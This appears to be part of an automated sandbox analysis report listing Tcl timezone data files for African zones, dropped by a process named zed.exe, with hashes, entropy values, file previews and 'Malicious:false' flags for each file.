                                                                                                                                                                                                                                            SHA-256:653AF88955C4418D973E2F8681A99552EB7BE95BCA64C736072F488462F7B373
                                                                                                                                                                                                                                            SHA-512:3016D0636F401BD88BCD460F6A61782E7E8A2C32CE4ECB904C711DF414038A5818F0CA3D7FC671C5ABCE70647FC674A2EF9081C5289EBFD184B44885902E007A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Gaborone) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.884642061266759
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2Dc0B5h4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2Dlfh4Dt
                                                                                                                                                                                                                                            MD5:8666DABE8D196ACD94A9691C592FAF4E
                                                                                                                                                                                                                                            SHA1:9F7EE009DCEAACA79C6EAA6FC73015D595467919
                                                                                                                                                                                                                                            SHA-256:06B82C524585192E0E8FC69DCC1CF86183A8C5EF404645DC413FCF3F8C16B0AB
                                                                                                                                                                                                                                            SHA-512:AAA32FD1B01BFECDD0D1C9C1DF1163374DAFE094C75720EA4095C34F7EAE7DCB594D1A7F6A2A90FB43FF01020F7AEB48E92496E0EE2D039AF23076CD369DD2A7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Harare) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):309
                                                                                                                                                                                                                                            Entropy (8bit):4.695542624694403
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2DWbzDm2OHePoHvmmXsd//HF2d7d6VcF2d6KsYov:MB862DW7mdHePCvmmcZvF0cVcF/KsFv
                                                                                                                                                                                                                                            MD5:F0E153FC9B978E30742ABC025CA45E02
                                                                                                                                                                                                                                            SHA1:73D96F3188190DAC2453E6F18A1C683CECB9CDE3
                                                                                                                                                                                                                                            SHA-256:5EEF6475E1312051037FCAE3354E32DC0910BE7A5116B71F8CCBE1CCA08D3F1C
                                                                                                                                                                                                                                            SHA-512:E66F4B5FF18BAAD53AFB1ED36A0827115C793075A61F794F26F32BC9F6799DF816A1F817BEB0C0BC938F89E6F5BFBE1AB4F504F1AF518764103FB287746552C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Johannesburg) {.. {-9223372036854775808 6720 0 LMT}.. {-2458173120 5400 0 SAST}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {-829526400 10800 1 SAST}.. {-813805200 7200 0 SAST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1127
                                                                                                                                                                                                                                            Entropy (8bit):4.027824722230131
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5mesdOkMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8M5:5YMV04MSHMzNxMbwM0JXMfCsMzaMq0QJ
                                                                                                                                                                                                                                            MD5:32EC0589260D9D4BCC85FE91E6F04D00
                                                                                                                                                                                                                                            SHA1:BAA269852C4AC6B89EA7941E7A75A007E0CF9EDF
                                                                                                                                                                                                                                            SHA-256:F2646E15488ABF2E960759CEFE5705416E71DA71BB8407B26196244FD1A3394F
                                                                                                                                                                                                                                            SHA-512:4F485453BE1D186ADBE0908852475C63C57BA498091C222EFFB9A5FEA2DB7F55E1BB2DBDBF6AC0F24CC67D47549FA3F5257655B5449B1BCF1FB5CDB27B03D501
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Juba) {.. {-9223372036854775808 7588 0 LMT}.. {-1230775588 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.837466713772859
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcJEl2DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DIEl2V
                                                                                                                                                                                                                                            MD5:E929ED1BC316C71AABE7E625BD562FB1
                                                                                                                                                                                                                                            SHA1:C20C172518C02D93327F4BBBC5D410BFFEF5039D
                                                                                                                                                                                                                                            SHA-256:8EA3028CE2B025F0C457DC8F7601279CA5AF565A88B9FE80208F9F1030F2B0D0
                                                                                                                                                                                                                                            SHA-512:B2FBCF06EACCF18DE97AF1D6BC57D9638E0A36DBF17044FF97F6B9E5089CF9E13E1304F304495324C0ACC1128A7D2D494E7C1FDB95DB0855FCE54F7028096C50
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Kampala) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1131
                                                                                                                                                                                                                                            Entropy (8bit):4.0421745451318385
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5xe9dSXMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8MM:5hMV04MSHMzNxMbwM0JXMfCsMzaMq0Qc
                                                                                                                                                                                                                                            MD5:2BD3850DDBE2F05BF6F24F3AEFF7516C
                                                                                                                                                                                                                                            SHA1:22B0DBB54E071F30D51A8654CF103F99537F74CD
                                                                                                                                                                                                                                            SHA-256:F475DB8A857A46B310B12C21D6A9BC6CA9FF2960DA429A9D57FA375F9439E13B
                                                                                                                                                                                                                                            SHA-512:1CF82FC07348C697F26625673DA7E3D734358B3FBE69D8E2132CAC0D9F00C7E8CDC353676CD9BAC4CBB9E26CF6638CEAE41DF559E7445D9C453409D7115FFC6C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Khartoum) {.. {-9223372036854775808 7808 0 LMT}.. {-1230775808 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.910322325134086
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcCJRx+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DRX+DEi
                                                                                                                                                                                                                                            MD5:3017253E1C6ACCA8D470A014E4BB321D
                                                                                                                                                                                                                                            SHA1:671B7AC04580B56E2C34F88D123E8296947DDD7E
                                                                                                                                                                                                                                            SHA-256:73FEB807006897B4B485CB82394867444E890265EFE960EC66D6C0E325DA9372
                                                                                                                                                                                                                                            SHA-512:2498C380D761A16C183D78BC1BB18B1D2A1BFCB9C703D86A3FC04CCCE43D88C8D4BC3C47CC31639B78A5FE9C8A7445E9DBB52062E2F3B737DA1E7D0FF70F140A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Kigali) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.866127364448228
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcqQFeDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DdD4yn
                                                                                                                                                                                                                                            MD5:41209A335A99803239A854575190C5ED
                                                                                                                                                                                                                                            SHA1:E6EA627C25513B9DDE053F9A24D509AA317C30A1
                                                                                                                                                                                                                                            SHA-256:611375C4901AD6C4844C2BB7D02FB17F34996F49E642546A6784D6F0B28530CC
                                                                                                                                                                                                                                            SHA-512:DF2C0B131F35F54DF5EBF7F8459F98DBABEB6F081247BA95B5D7B41146E2A2EF9BC6B1D909DE57A1223D9C258AB197D9668ED2E111A365C86BABDAA7DF551FB6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Kinshasa) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):235
                                                                                                                                                                                                                                            Entropy (8bit):4.7936510664790815
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2D4JDm2OHWQvvoHvBsp9boFvoHzIX7uRe6vF9:MB862DymdHWQCvqpmVCzIq
                                                                                                                                                                                                                                            MD5:EC08046589E85D999A597252FF5368B7
                                                                                                                                                                                                                                            SHA1:126E3DE158E1E7AF4737D0AB5B51C0F92F416DC7
                                                                                                                                                                                                                                            SHA-256:DCC9F52F539A67DFD7ABAFDE072ACDAE2B67754C559C8A5FE61979F5A286A066
                                                                                                                                                                                                                                            SHA-512:84B9AB18BC343C8B8934F5FDD2E2EB413925B04D6F5394AA8337B7B55E6487FB071A83A69BD4D0FA40F7F31EBC57B9908729674542CEA3083D700FCD02D77633
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Lagos) {.. {-9223372036854775808 815 0 LMT}.. {-2035584815 0 0 GMT}.. {-1940889600 815 0 LMT}.. {-1767226415 1800 0 +0030}.. {-1588465800 3600 0 WAT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.865878143076229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcr7bp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dgfp4D4y
                                                                                                                                                                                                                                            MD5:35D8A58EE21E603C6FC4FB896AE6B3D0
                                                                                                                                                                                                                                            SHA1:F1D0A939D761F3F0954F045814CF5339A5597036
                                                                                                                                                                                                                                            SHA-256:AB3E797548C7663CF9ABA7FE163635FF7CAB9E6CB61FA1644C0F7B4B5CCE8B99
                                                                                                                                                                                                                                            SHA-512:97717961987F6B6832C24A7833150CDFE7E82BBEB32DFDB84D2500442AAD9263F8BD4E879591E913D56E9A1991C389EF730211853647A889F358AE3FA37C0185
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Libreville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.862780607964543
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcih4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DNh4D4
                                                                                                                                                                                                                                            MD5:EA21ABBF8B11953916A1C509B8A1B427
                                                                                                                                                                                                                                            SHA1:35ADC230C57B001BE8A99A3D2E34B609A60A1162
                                                                                                                                                                                                                                            SHA-256:EACA9124F17E5B11F27D11FA6141D19EB3AC23E155E155B73467BDAA3BC99AA7
                                                                                                                                                                                                                                            SHA-512:A7972D4F1C5FB988CA04B39E2CDD580F51383BA9D7A66C478275C11A07B8D7A6EFF53A3E1929B0D89F10BCC39D22F285DB2601ED60DB4647C65465643F70C137
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Lome) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.856982839546061
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DccLtBQDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DXQD4yn
                                                                                                                                                                                                                                            MD5:40CD47F6DCF51EBEFEF42489F1716257
                                                                                                                                                                                                                                            SHA1:DF245192A1899A72DE01A57F6969AC060E841734
                                                                                                                                                                                                                                            SHA-256:4C2FD1E44DFAAF0C0DD2EB56B84B538F1E2D84B301AB2CFB8EE7759783501444
                                                                                                                                                                                                                                            SHA-512:D39BEB0EEF344B1A44F7D6A806A1D5B956D7D402648EE0C67C4BA46493236840AF975D89A91B2D33B8AA7D6DC9A051E66718DCDBC1C83B0E964215C2E32ED923
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Luanda) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.940313336280723
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcfpT0DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2D8pT0Dt
                                                                                                                                                                                                                                            MD5:71A5DE1276902DB1542840318F9B1AF3
                                                                                                                                                                                                                                            SHA1:AC3825BF343482E0E4D9D6FAA6FCA4D1A125433B
                                                                                                                                                                                                                                            SHA-256:24384EEC359FD24D181AAEF3C017E3C345490A8D352B29D19B1B143A29A811C2
                                                                                                                                                                                                                                            SHA-512:2984EB42A79B8B32BB93DFE71F1C4C0CABFDC9B0A199971347BB3473463FA07FDB5D20227D288BF8653B1BDE347E1297459BBB4C3C34AF7A5434FBF945683577
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lubumbashi) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.905174746463853
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcOf+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkDEi
                                                                                                                                                                                                                                            MD5:1D7FDB388535CC59742CA0F1AEE27FBD
                                                                                                                                                                                                                                            SHA1:A99FF2CAC47FD333429C22B271E190D979EEC024
                                                                                                                                                                                                                                            SHA-256:B00801A7279741434D9C2D7EC7322DD93B85EA4F5C9976AB3A43F0AB142E1553
                                                                                                                                                                                                                                            SHA-512:0174D3C6F9116C36C62AD1EB58203EE7DFE8C37F618B8449D5E45AD6290CF8334F28798877D7A563A12EE533026244D6A49BCCF29B5D7FCB5BCC91481D0DDDE2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lusaka) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.857096806490649
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcn2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D42D4yn
                                                                                                                                                                                                                                            MD5:1CA9B3E7BCD5BC1CC881453D16B09389
                                                                                                                                                                                                                                            SHA1:1B1964B314E72847D71A42C147CF2BF331B44461
                                                                                                                                                                                                                                            SHA-256:35D56EFFE9E7E60F17B32BD30486E566B635F0AE7A8948D77395B8E6332E26F1
                                                                                                                                                                                                                                            SHA-512:9E08D57B7824F5B076D159D9A5106E51450DF24729C36F485B9B68E8F47E8DFC50F9BEC3F11E0AE6579A8E372A5C0F0DA18A2E797CF2115519D1B4E5B64413DD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Malabo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):149
                                                                                                                                                                                                                                            Entropy (8bit):4.952872531197478
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2DcfKiMXGm2OHoVoHvdSF2I:SlSWB9eg/2DEZDm2OHoVoHvdI
                                                                                                                                                                                                                                            MD5:CD429B6891CBF603A93F9A9733E2391B
                                                                                                                                                                                                                                            SHA1:C6833B83B6D1694AC632018A27915E6F97F708AE
                                                                                                                                                                                                                                            SHA-256:FE6B6A4BE1B61F7F909A3F6137530DFE6D1754499A4D9B0D1CE4952FFF0AE62D
                                                                                                                                                                                                                                            SHA-512:6E57B70B71515998AD617954F9DDAE19968B20946542201153DAB47FBE63790D42F41AE29148ECBCE6D12812879BCF0A4EC881507B62CDB2675AB20267220BF9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Maputo) {.. {-9223372036854775808 7820 0 LMT}.. {-2109291020 7200 0 CAT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):199
                                                                                                                                                                                                                                            Entropy (8bit):4.964472328419063
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DZQs+DWb4n:MByMaHw7NH/t2DZiDWU
                                                                                                                                                                                                                                            MD5:88C8FF2B480648EDADBD0FB93F754275
                                                                                                                                                                                                                                            SHA1:BED7A784C378909914CEB0D303DFE6D05FD576B7
                                                                                                                                                                                                                                            SHA-256:1D80FD86CB733D57D88ECD404E702F750B233ED0CCBFBFFFEED1AAD3B7F1CB04
                                                                                                                                                                                                                                            SHA-512:CB7F831CF099E85B948AE57FCE9D91C7EAAD39753AF82C56EC15B65830EB4115A71BBC83A71A2AC947CAB24DEDDB557E02FAA5A3264546AE6E60607DF6BD2FA3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Maseru) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                                                            Entropy (8bit):4.957246428185456
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DzjEHp4DWb4n:MByMaHw7NH/t2DzjEJ4DWU
                                                                                                                                                                                                                                            MD5:CA7255B86425BA706D214924856B6818
                                                                                                                                                                                                                                            SHA1:E9BE6CF871BB1786E842953D41392299952EC9AC
                                                                                                                                                                                                                                            SHA-256:547197C09C1987350AE5720A4EEC7E8D8F4B9F4A0559726E225E13C707F7C564
                                                                                                                                                                                                                                            SHA-512:23F9AD0F926A0945A17BBC3DCFF9A3D7EE68EC9423EA78985F5FFC60CC61641B57871F9AA703B5FB9BE842DCD4693D0641F9EDED702240873F58D24CD4D60C32
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Mbabane) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.877126792757121
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcBEBXCEeDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DFSVDR
                                                                                                                                                                                                                                            MD5:5C2E2B5189E0E816D5BD7AFC8B49A35E
                                                                                                                                                                                                                                            SHA1:4E43A1ED51399528636D6442B1DDFFD820911407
                                                                                                                                                                                                                                            SHA-256:25E221BE49DEC5547A74AEB91B0041859C59BC866987272A447AB2343D1CC30C
                                                                                                                                                                                                                                            SHA-512:B74735CFAB692756BAADFB1A51A8CC0C986F981D8E7E7A8182370A9017E67439875F0115820A349AFB3BE2FA581A721440968EF817471DD2C5E1286E53B2FE99
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Mogadishu) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):208
                                                                                                                                                                                                                                            Entropy (8bit):4.8660011420394955
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2D3NPDm2OHrFGxYoHvlHIg5pTwdPsy:MB862D3NbmdHhmYCvdIg5GPsy
                                                                                                                                                                                                                                            MD5:1B3C94B5098E454981C73C1F2AF80164
                                                                                                                                                                                                                                            SHA1:1EBA9E2DBEA70BB1AE5EB13739518AB5A62D2130
                                                                                                                                                                                                                                            SHA-256:2BF0D90610211651127402680519B29AB50B15D344263D0C1A22EDEBE5E01E27
                                                                                                                                                                                                                                            SHA-512:DA4A0BCE7C6750BD7D3BA76B6301B9390723BE0C001C39BE453D80BD87020C2253A75629F68F83C19410D2A75FAF5223A435299CD4AA53DE545EC7C5B5AA54B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Monrovia) {.. {-9223372036854775808 -2588 0 LMT}.. {-2776979812 -2588 0 MMT}.. {-1604359012 -2670 0 MMT}.. {63593070 0 0 GMT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):277
                                                                                                                                                                                                                                            Entropy (8bit):4.655052651600954
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2Dk1Dm2OHsvT5oH99VCV22ufPnVCkVBKBQn9q:MB862DGmdHsvVCjkifvdH9q
                                                                                                                                                                                                                                            MD5:B640661FB37BB74FAB172DBDF1B433E1
                                                                                                                                                                                                                                            SHA1:0236A5B53443A4A18B8B9D6AA7732620BE9A6553
                                                                                                                                                                                                                                            SHA-256:BD8E9765174431C0D403249D3E881C949C83966E9F8162552DA88AE53132467B
